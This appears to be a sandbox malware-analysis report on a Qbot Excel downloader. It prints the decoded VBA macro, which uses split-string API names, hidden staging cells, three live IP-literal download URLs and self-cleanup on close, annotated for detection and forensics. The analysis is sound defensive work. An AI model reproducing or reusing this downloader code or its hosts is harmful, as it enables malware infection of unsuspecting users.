MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection explicitly identifies the sample as Xls.Downloader.Qbot, indicating downloader functionality. The presence of an Auto_Open VBA macro (T1059.005) strongly suggests that the macro is designed to execute automatically when the Excel file is opened, likely to initiate the download and execution of a secondary payload. The extracted macro source corroborates this: it assembles the string "URLDownloadToFileA" from split literals and writes three HTTP URLs to IP-literal hosts into worksheet cells. This is consistent with Qbot's typical behavior as a downloader.
Heuristics 3
-
ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Auto_Open macro — high — OLE_VBA_AUTO: Auto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 44ce8de16df26234abe008370d6052886255e8593ab511fcea07f165f11d76f7) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6348 bytes |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Document module (ThisWorkbook) as decoded by olevba. The Attribute lines
' above are VBA project export metadata, not executable statements.
Option Explicit
' Module-level flags. Neither is read or written anywhere in the visible
' preview; they may be leftovers from the template the lure was built on.
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
' Toggles the logo and button shapes on the "Dashboard" sheet depending on
' whether Excel reports a Mac operating system. Nothing in this routine
' touches the network, the file system or the "Nneeri" sheet used by the
' other modules; it reads like lure/template UI code rather than part of
' the downloader chain. NOTE(review): no visible caller in this preview.
Public Sub applyLogosToDashboard()
Application.ScreenUpdating = False
If Not Application.OperatingSystem Like "*Mac*" Then
Sheets("Dashboard").Activate
' Windows branch: unprotect password comes from Logos!IV1, and the branch
' re-protects "Logos" (not "Dashboard") with Dashboard!IV1 — asymmetric with
' the Mac branch below; presumably a template quirk rather than intentional.
Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
ActiveSheet.Shapes("Apple_Logo").Visible = False
ActiveSheet.Shapes("Win_Logo").Visible = True
ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
ActiveSheet.Shapes("Button_Print_PDF").Visible = True
ActiveSheet.Shapes("Button_Save_As").Visible = True
ActiveSheet.Shapes("Button_Help").Visible = True
ActiveSheet.Shapes("Button_Versions").Visible = True
Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
Else
' Mac branch: shows the Apple logo, hides the Windows-only buttons, and
' protects "Dashboard" itself with its own IV1 password.
Sheets("Dashboard").Activate
Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
ActiveSheet.Shapes("Apple_Logo").Visible = True
ActiveSheet.Shapes("Win_Logo").Visible = False
ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
ActiveSheet.Shapes("Button_Print_PDF").Visible = False
ActiveSheet.Shapes("Button_Save_As").Visible = False
Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
End If
Application.ScreenUpdating = True
End Sub
' Refuses to run on Excel versions below 12 (Excel 2007) and otherwise shows
' a modal form named frmMain. frmMain is not part of the extracted preview,
' so what that form does cannot be determined from here. NOTE(review): no
' visible caller for InitWorkbook in this preview either.
Private Sub InitWorkbook()
If VBA.Val(Application.Version) < 12 Then
MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
' Close the workbook without saving changes.
Me.Close False
Exit Sub
End If
'
' frmMain is shown modally; the commented-out placeholders below suggest
' template scaffolding rather than sample-specific code.
With New frmMain
.Show
'Other code
'
'
'
End With
End Sub
' Workbook close handler: silently deletes the "Nneeri" worksheet — the sheet
' that every function in Module1–Module4 writes its URLs, paths and formulas
' into. With On Error Resume Next and DisplayAlerts off, the deletion raises
' no prompt and no error. For forensic work, analyze the file as received
' rather than after it has been opened and closed in Excel, because this
' cleanup removes the staging sheet.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Application.DisplayAlerts = False
Sheets("Nneeri").Delete
Application.DisplayAlerts = True
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' Writes three worksheet formulas into Nneeri!H10:H12. Each formula calls a
' function named "Kopast" (the same name Diopaster stores as text in
' Nneeri!I12) with H24/H25/H26 & K17 & K18 as its second argument and
' G10/G11/G12 as its third. Given what the other modules place in those
' cells, that is <http://IP/> & NOW() & ".dat" (a remote URL) and
' "..\Lifas.ver*" (a local destination path) respectively.
' NOTE(review): how "Kopast" becomes callable from a formula is not shown in
' this preview, and Hrosters has no visible caller — Biolaster or kjhkjlkj
' (both undefined here) are the candidates.
Function Hrosters()
Sheets("Nneeri").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)"
Sheets("Nneeri").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)"
Sheets("Nneeri").Range("H12") = "=Kopast(0,H26&K17&K18,G12,0,0)"
End Function
Attribute VB_Name = "Module2"
' Stages the API identifiers the download chain depends on, using split
' string literals that only form the full names at runtime — a common
' static-signature evasion pattern worth a detection rule on its own.
' Nneeri!I9 receives "uRlMon" and Nneeri!I10 receives "URLDownloadToFileA";
' K17 (=NOW()) and K18 (".dat") become part of the remote file name via the
' Hrosters formulas; H35 receives "=HALT()". Diopaster is called before the
' cells are filled and kjhkjlkj afterwards; kjhkjlkj is not in the preview.
Function Retio()
net = "uR"
net1 = "Mon"
dff = "URLDownload"
dff1 = "ToFileA"
Diopaster
' "uR" & "l" & "Mon" -> "uRlMon"
Sheets("Nneeri").Range("I9") = net & "l" & net1
Sheets("Nneeri").Range("K18") = ".dat"
Sheets("Nneeri").Range("K17") = "=NOW()"
Sheets("Nneeri").Range("H35") = "=HALT()"
' "URLDownload" & "ToFileA" -> "URLDownloadToFileA"
Sheets("Nneeri").Range("I10") = dff & dff1
kjhkjlkj
End Function
Attribute VB_Name = "Module3"
' Orchestrates staging of the "Nneeri" sheet: calls Biolaster (not in the
' preview), writes the function name "Kopast" into I12, hides the sheet from
' the user, then fills in the local paths (Nyrtyfh) and remote URLs (dfgdf).
' ScreenUpdating is switched off here and not restored within this function.
Function Diopaster()
Application.ScreenUpdating = False
Biolaster
Sheets("Nneeri").Range("I12") = "Kopast"
' Hiding the staging sheet keeps the URLs/paths out of the user's view.
Sheets("Nneeri").Visible = False
Nyrtyfh
dfgdf
End Function
' Writes three relative destination paths into Nneeri!G10:G12. These cells
' are the third argument of the Hrosters formulas, so each is the local file
' the corresponding URL in H24:H26 would be saved to; the ".." prefix is
' presumably resolved relative to the current directory at call time.
' These file names are host-based IoCs for this sample.
Function Nyrtyfh()
Sheets("Nneeri").Range("G10") = "..\Lifas.ver"
Sheets("Nneeri").Range("G11") = "..\Lifas.ver1"
Sheets("Nneeri").Range("G12") = "..\Lifas.ver2"
End Function
Attribute VB_Name = "Module4"
' Writes the three remote hosts into Nneeri!H24:H26 as http:// URLs built
' from a split scheme prefix. These IP-literal hosts are the network IoCs of
' the sample and the first thing to match against proxy, DNS and firewall
' logs. Finally fills Nneeri!A1:M100 black, which visually hides the staged
' cell contents should the sheet ever be unhidden.
Function dfgdf()
dgdgerwrh = "http://"
Sheets("Nneeri").Range("H24") = dgdgerwrh & "190.14.37.254/"
Sheets("Nneeri").Range("H25") = dgdgerwrh & "91.242.229.89/"
Sheets("Nneeri").Range("H26") = dgdgerwrh & "185.123.53.229/"
Sheets("Nneeri").Range("A1:M100").Interior.Color = vbBlack
End Function
Attribute VB_Name = "Module6"
Sub auto_open()
Set Fera = E
... (truncated)